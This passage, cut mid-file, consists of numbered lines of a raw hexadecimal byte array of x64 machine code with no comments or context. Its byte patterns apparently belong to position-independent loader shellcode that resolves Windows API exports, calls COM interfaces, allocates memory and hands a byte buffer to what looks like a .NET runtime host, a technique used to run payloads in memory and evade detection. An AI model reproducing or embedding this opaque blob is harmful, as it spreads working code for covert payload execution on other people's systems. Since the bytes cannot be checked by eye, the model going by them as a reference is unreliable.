193 0x5e, 0x5d, 0xc3, 0x48, 0x8b, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x4c, 0x24,
194 0x30, 0x0f, 0xb7, 0x04, 0x70, 0x44, 0x8b, 0x04, 0x81, 0x4c, 0x03, 0xc3,
195 0x4c, 0x3b, 0xc7, 0x0f, 0x82, 0xaf, 0x00, 0x00, 0x00, 0x41, 0x8b, 0x84,
196 0x1f, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc7, 0x4c, 0x3b, 0xc0, 0x0f,
197 0x83, 0x9b, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x44, 0x8b, 0xcb, 0x41, 0x38,
198 0x18, 0x74, 0x21, 0x41, 0x83, 0xf9, 0x3c, 0x73, 0x1b, 0x41, 0x8b, 0xc9,
199 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44, 0x0c, 0x40, 0x42, 0x80, 0x3c, 0x01,
200 0x2e, 0x74, 0x09, 0x41, 0xff, 0xc1, 0x43, 0x38, 0x1c, 0x01, 0x75, 0xdf,
201 0x41, 0x8d, 0x41, 0x01, 0x8b, 0xd0, 0xc6, 0x44, 0x04, 0x40, 0x64, 0x41,
202 0x8d, 0x41, 0x02, 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x03,
203 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x04, 0x4e, 0x8d, 0x0c,
204 0x02, 0x88, 0x5c, 0x04, 0x40, 0x8b, 0xd3, 0x41, 0x38, 0x19, 0x74, 0x17,
205 0x83, 0xfa, 0x7f, 0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04,
206 0x09, 0x88, 0x44, 0x0d, 0x80, 0x42, 0x38, 0x1c, 0x0a, 0x75, 0xe9, 0x8b,
207 0xc2, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x88, 0x5c, 0x05, 0x80, 0x41, 0xff,
208 0x54, 0x24, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x11, 0x48, 0x8d, 0x55, 0x80,
209 0x48, 0x8b, 0xc8, 0x41, 0xff, 0x54, 0x24, 0x38, 0x4c, 0x8b, 0xc0, 0xeb,
210 0x03, 0x4c, 0x8b, 0xc3, 0x49, 0x8b, 0xc0, 0xe9, 0x10, 0xff, 0xff, 0xff,
211 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b,
212 0xda, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
213 0x48, 0x83, 0x63, 0x30, 0x00, 0x48, 0x8b, 0x4b, 0x38, 0x48, 0x85, 0xc9,
214 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x38,
215 0x00, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b,
216 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x28, 0x00, 0x48, 0x8b, 0x4b,
217 0x20, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
218 0x48, 0x83, 0x63, 0x20, 0x00, 0x48, 0x8b, 0x4b, 0x18, 0x48, 0x85, 0xc9,
219 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x18,
220 0x00, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x85, 0xc9, 0x74, 0x15, 0x48, 0x8b,
221 0x01, 0xff, 0x50, 0x58, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8b, 0x01, 0xff,
222 0x50, 0x10, 0x48, 0x83, 0x63, 0x10, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48,
223 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83,
224 0x63, 0x08, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0x48,
225 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x23, 0x00, 0x48, 0x83, 0xc4,
226 0x20, 0x5b, 0xc3, 0xcc, 0xf0, 0xff, 0x41, 0x20, 0x8b, 0x41, 0x20, 0xc3,
227 0x48, 0x8b, 0x49, 0x10, 0x45, 0x8b, 0xd1, 0x4c, 0x8b, 0x4c, 0x24, 0x30,
228 0x49, 0x8b, 0xd0, 0x45, 0x8b, 0xc2, 0x48, 0x8b, 0x01, 0x48, 0xff, 0x60,
229 0x50, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83,
230 0xec, 0x20, 0x49, 0x8b, 0xd9, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x75,
231 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x13, 0x48, 0x8b, 0x49, 0x10,
232 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48, 0x8b, 0x47, 0x10, 0x48, 0x89,
233 0x03, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x83, 0xc4, 0x20,
234 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x85, 0xd2, 0x75, 0x06, 0xb8, 0x03, 0x40,
235 0x00, 0x80, 0xc3, 0xc7, 0x02, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc3,
236 0x48, 0x83, 0xec, 0x48, 0x48, 0x8b, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00,
237 0x4c, 0x8b, 0xd9, 0x48, 0x8b, 0x49, 0x10, 0x44, 0x8b, 0xc2, 0x44, 0x0f,
238 0xb7, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd3, 0x48, 0x89, 0x44, 0x24, 0x38,
239 0x48, 0x8b, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x11, 0x48,
240 0x89, 0x44, 0x24, 0x30, 0x48, 0x8b, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
241 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x44, 0x24, 0x78, 0x48, 0x89,
242 0x44, 0x24, 0x20, 0x41, 0xff, 0x52, 0x58, 0x48, 0x83, 0xc4, 0x48, 0xc3,
243 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
244 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8b, 0xf9,
245 0x48, 0x8d, 0x0d, 0x31, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x89,
246 0x08, 0x48, 0x8d, 0x0d, 0x0c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
247 0x89, 0x48, 0x08, 0x48, 0x8d, 0x0d, 0xa6, 0x02, 0x00, 0x00, 0x48, 0x8b,
248 0x02, 0x48, 0x89, 0x48, 0x10, 0x48, 0x8d, 0x0d, 0x50, 0xff, 0xff, 0xff,
249 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x18, 0x48, 0x8d, 0x0d, 0x06, 0xff,
250 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x20, 0x48, 0x8d, 0x0d,
251 0xdc, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x28, 0x48,
252 0x8d, 0x0d, 0x3a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
253 0x30, 0x48, 0x8d, 0x0d, 0xb4, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
254 0x89, 0x48, 0x38, 0x48, 0x8d, 0x0d, 0x3a, 0xf5, 0xff, 0xff, 0x48, 0x8b,
255 0x02, 0x48, 0x89, 0x48, 0x40, 0x48, 0x8d, 0x0d, 0x2c, 0xf5, 0xff, 0xff,
256 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x48, 0x48, 0x8d, 0x0d, 0x1e, 0xf5,
257 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8d, 0x0d,
258 0x10, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x58, 0x48,
259 0x8d, 0x0d, 0x02, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
260 0x60, 0x48, 0x8d, 0x0d, 0xec, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48,
261 0x89, 0x48, 0x68, 0x48, 0x8d, 0x0d, 0xe6, 0xf4, 0xff, 0xff, 0x48, 0x8b,
262 0x02, 0x48, 0x89, 0x48, 0x70, 0x48, 0x8d, 0x0d, 0xd8, 0xf4, 0xff, 0xff,
263 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x78, 0x48, 0x8d, 0x0d, 0xca, 0xf4,
264 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x80, 0x00, 0x00, 0x00,
265 0x48, 0x8d, 0x0d, 0xb9, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89,
266 0x88, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xa8, 0xf4, 0xff, 0xff,
267 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d,
268 0x0d, 0x97, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x98,
269 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x86, 0xf4, 0xff, 0xff, 0x48, 0x8b,
270 0x02, 0x48, 0x89, 0x88, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x75,
271 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xa8, 0x00, 0x00,
272 0x00, 0x48, 0x8d, 0x0d, 0x64, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
273 0x89, 0x88, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x53, 0xf4, 0xff,
274 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48,
275 0x8d, 0x0d, 0x42, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88,
276 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x55, 0x01, 0x00, 0x00, 0x48,
277 0x8b, 0x02, 0x48, 0x89, 0x88, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x02,
278 0x48, 0x8d, 0x0d, 0x1d, 0xf4, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x28, 0x00,
279 0x01, 0x00, 0x00, 0x48, 0x89, 0x88, 0xd0, 0x00, 0x00, 0x00, 0x4c, 0x8d,
280 0x87, 0xe8, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8d, 0x0d, 0xfd,
281 0xf3, 0xff, 0xff, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x88, 0xd8, 0x00,
282 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xeb, 0xf3, 0xff, 0xff, 0x48, 0x8b, 0x02,
283 0x48, 0x89, 0x88, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xda, 0xf3,
284 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xe8, 0x00, 0x00, 0x00,
285 0x48, 0x8d, 0x44, 0x24, 0x30, 0x83, 0x62, 0x20, 0x00, 0x33, 0xc9, 0x48,
286 0x89, 0x7a, 0x28, 0x33, 0xd2, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x57,
287 0x70, 0x48, 0x8d, 0x53, 0x08, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97,
288 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x15, 0x48, 0x8b, 0x4b, 0x08,
289 0x4c, 0x8d, 0x43, 0x10, 0x48, 0x8d, 0x97, 0x84, 0x06, 0x00, 0x00, 0x48,
290 0x8b, 0x01, 0xff, 0x50, 0x30, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x02, 0x00,
291 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3,
292 0x5f, 0xc3, 0xcc, 0xcc, 0x4c, 0x8b, 0xc9, 0x4d, 0x85, 0xc0, 0x75, 0x06,
293 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x48, 0x8b, 0x49, 0x28, 0x48, 0x8b,
294 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48, 0x8b,
295 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x32, 0x48,
296 0x8b, 0x81, 0x04, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48,
297 0x8b, 0x81, 0x0c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
298 0x48, 0x8b, 0x81, 0x84, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x13,
299 0x48, 0x8b, 0x81, 0x8c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
300 0x06, 0x4d, 0x89, 0x08, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x20, 0x00, 0xb8,
301 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
302 0x48, 0x8b, 0x49, 0x18, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xba, 0xfd,
303 0xff, 0xff, 0xff, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x70, 0x33, 0xc0, 0x48,
304 0x83, 0xc4, 0x28, 0xc3, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x20,
305 0xff, 0xc8, 0xc3, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0x41, 0x28,
306 0x8b, 0xca, 0xff, 0x50, 0x68, 0x33, 0xc0, 0x48, 0x83, 0xc4, 0x28, 0xc3,
307 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00,
308 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8d, 0x99, 0x6c, 0x04, 0x00, 0x00, 0x8a,
309 0x03, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x84, 0xc0, 0x74, 0x56, 0x48,
310 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0x48, 0x2b, 0xd3, 0x3c, 0x3b,
311 0x74, 0x1b, 0x49, 0x81, 0xf8, 0x80, 0x00, 0x00, 0x00, 0x7d, 0x12, 0x88,
312 0x04, 0x11, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
313 0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
314 0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
315 0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xca, 0x1a,
316 0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
317 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
318 0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
319 0xec, 0x50, 0x33, 0xdb, 0x48, 0x8b, 0xc2, 0x4c, 0x8b, 0xc9, 0x48, 0x85,
320 0xd2, 0x74, 0x37, 0x44, 0x8d, 0x43, 0x30, 0x48, 0x8b, 0xc8, 0x48, 0x8d,
321 0x54, 0x24, 0x20, 0x41, 0xff, 0x51, 0x58, 0x83, 0xf8, 0x30, 0x75, 0x22,
322 0x81, 0x7c, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7c,
323 0x24, 0x48, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0a, 0x83, 0x7c, 0x24, 0x44,
324 0x04, 0x75, 0x03, 0x8d, 0x58, 0xd1, 0x8b, 0xc3, 0xeb, 0x02, 0x33, 0xc0,
325 0x48, 0x83, 0xc4, 0x50, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
326 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
327 0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
328 0x40, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xff, 0x41, 0x83, 0xcc,
329 0xff, 0x4d, 0x8b, 0xf0, 0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf1, 0xbf, 0x00,
330 0x01, 0x00, 0x00, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xba, 0x00, 0x00, 0x00,
331 0x48, 0x8d, 0x91, 0x24, 0x06, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x14, 0x06,
332 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x78, 0x7d, 0x48, 0x8d, 0x44,
333 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c, 0x48, 0x89,
334 0x44, 0x24, 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56,
335 0x70, 0x49, 0x8b, 0x0e, 0x49, 0x8d, 0x5e, 0x08, 0x4c, 0x8d, 0x86, 0x34,
336 0x06, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
337 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
338 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
339 0x50, 0x50, 0x85, 0xc0, 0x78, 0x33, 0x44, 0x39, 0xbc, 0x24, 0x60, 0x02,
340 0x00, 0x00, 0x74, 0x25, 0x48, 0x8b, 0x0b, 0x4d, 0x8d, 0x4e, 0x10, 0x4c,
341 0x8d, 0x86, 0x54, 0x06, 0x00, 0x00, 0x48, 0x8d, 0x96, 0x44, 0x06, 0x00,
342 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x08, 0x4c, 0x21, 0x3b,
343 0xeb, 0x03, 0x4d, 0x21, 0x3e, 0x85, 0xc0, 0x79, 0x30, 0x49, 0x8d, 0x46,
344 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x54, 0x06, 0x00, 0x00, 0x48, 0x89,
345 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x86, 0x44, 0x06, 0x00, 0x00, 0x33, 0xc9,
346 0xff, 0x96, 0x38, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x4d, 0x21,
347 0x7e, 0x10, 0x33, 0xc0, 0xe9, 0x23, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e,
348 0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x0e,
349 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28,
350 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
351 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d,
352 0x4c, 0x24, 0x30, 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e,
353 0x10, 0x4d, 0x8d, 0x4e, 0x18, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd0, 0x48,
354 0x8b, 0xf8, 0x4c, 0x8b, 0x11, 0x41, 0xff, 0x52, 0x60, 0x48, 0x8b, 0xcf,
355 0x8b, 0xd8, 0xff, 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x88,
356 0xb9, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x18, 0x48, 0x8d, 0x96, 0x64,
357 0x06, 0x00, 0x00, 0x4d, 0x8d, 0x46, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x10,
358 0x85, 0xc0, 0x0f, 0x88, 0x9d, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05,
359 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x44, 0x21,
360 0xbc, 0x24, 0x7c, 0x02, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0x89,
361 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x8d, 0x51, 0xf0, 0xff, 0x96, 0xa8,
362 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x74, 0x6a, 0x4c,
363 0x8b, 0x40, 0x10, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76,
364 0x15, 0x8a, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x42, 0x88, 0x04, 0x02,
365 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xeb, 0x49, 0x8b,
366 0x4e, 0x20, 0x4d, 0x8d, 0x46, 0x28, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0x01,
367 0xff, 0x90, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8b, 0x43, 0x10,
368 0x41, 0x0f, 0x94, 0xc7, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00,
369 0x76, 0x16, 0xc6, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x00, 0xc6, 0x04,
370 0x02, 0x00, 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xea,
371 0x48, 0x8b, 0xcb, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc7,
372 0x4c, 0x8d, 0x9c, 0x24, 0x30, 0x02, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
373 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41,
374 0x5c, 0x5f, 0x5e, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x20, 0x55, 0x56, 0x57,
375 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x90,
376 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0xd9, 0x48, 0x8b,
377 0x51, 0x48, 0xe8, 0x59, 0x12, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48,
378 0x8b, 0xcb, 0x48, 0x8b, 0x53, 0x50, 0x4c, 0x8b, 0xe0, 0xe8, 0x46, 0x12,
379 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93,
380 0x88, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0xe8, 0x30, 0x12, 0x00, 0x00,
381 0x4c, 0x8b, 0xf0, 0x4d, 0x85, 0xe4, 0x74, 0x35, 0x4d, 0x85, 0xff, 0x74,
382 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x8b, 0x13, 0xbd, 0x04, 0x00, 0x00,
383 0x00, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
384 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0x83,
385 0xbb, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff,
386 0xd6, 0x83, 0xc8, 0xff, 0x48, 0x8b, 0x9c, 0x24, 0xe8, 0x01, 0x00, 0x00,
387 0x48, 0x81, 0xc4, 0x90, 0x01, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
388 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x44, 0x8b, 0x03, 0x48, 0x8b,
389 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x1b, 0x17, 0x00, 0x00, 0x33, 0xd2, 0x48,
390 0x8d, 0x4c, 0x24, 0x40, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2b, 0x17, 0x00,
391 0x00, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x41, 0xbd, 0x01, 0x00,
392 0x00, 0x00, 0x75, 0x3b, 0x44, 0x8b, 0x0e, 0x4c, 0x8d, 0x86, 0x40, 0x02,
393 0x00, 0x00, 0x41, 0x81, 0xe9, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x56,
394 0x14, 0x48, 0x8d, 0x4e, 0x04, 0xe8, 0x46, 0x13, 0x00, 0x00, 0x48, 0x8b,
395 0x56, 0x28, 0x48, 0x8d, 0x8e, 0xf0, 0x07, 0x00, 0x00, 0xe8, 0xee, 0x11,
396 0x00, 0x00, 0x48, 0x3b, 0x86, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x97,
397 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x48, 0x8b,
398 0x56, 0x30, 0xe8, 0x5d, 0x11, 0x00, 0x00, 0x48, 0x89, 0x46, 0x30, 0x48,
399 0x85, 0xc0, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff, 0x48, 0x8d, 0x9e, 0x44,
400 0x02, 0x00, 0x00, 0x8a, 0x03, 0x33, 0xd2, 0x84, 0xc0, 0x74, 0x40, 0x33,
401 0xc9, 0x3c, 0x3b, 0x74, 0x1b, 0x81, 0xfa, 0x04, 0x01, 0x00, 0x00, 0x73,
402 0x13, 0x41, 0x03, 0xd5, 0x88, 0x84, 0x0c, 0x80, 0x00, 0x00, 0x00, 0x8b,
403 0xca, 0x8a, 0x04, 0x1a, 0x84, 0xc0, 0x75, 0xe1, 0x85, 0xd2, 0x74, 0x1b,
404 0x8d, 0x4a, 0x01, 0xc6, 0x84, 0x14, 0x80, 0x00, 0x00, 0x00, 0x00, 0x48,
405 0x03, 0xd9, 0x48, 0x8d, 0x8c, 0x24, 0x80, 0x00, 0x00, 0x00, 0xff, 0x56,
406 0x30, 0xeb, 0xb8, 0x41, 0x8b, 0xfd, 0x44, 0x39, 0xae, 0x40, 0x02, 0x00,
407 0x00, 0x76, 0x2c, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x8b, 0xdf,
408 0x48, 0x8b, 0x54, 0xde, 0x30, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x48, 0x89,
409 0x44, 0xde, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xfe, 0x01, 0x00, 0x00,
410 0x41, 0x03, 0xfd, 0x3b, 0xbe, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd4, 0x8b,
411 0x86, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x19, 0x48, 0x8b,
412 0xce, 0xe8, 0x0e, 0xf2, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xd8, 0x01,
413 0x00, 0x00, 0x48, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x1d, 0x83,
414 0xf8, 0x03, 0x0f, 0x84, 0xc6, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x9e, 0x20,
415 0x09, 0x00, 0x00, 0x41, 0x3b, 0xc5, 0x74, 0x08, 0x48, 0x8b, 0x9c, 0x24,
416 0xd0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xae, 0x6c, 0x05, 0x00, 0x00, 0x74,
417 0x32, 0x48, 0x8b, 0xce, 0xe8, 0x9f, 0xef, 0xff, 0xff, 0x85, 0xc0, 0x75,
418 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x90, 0x01,
419 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x9e, 0xf0, 0xff, 0xff, 0x85, 0xc0,
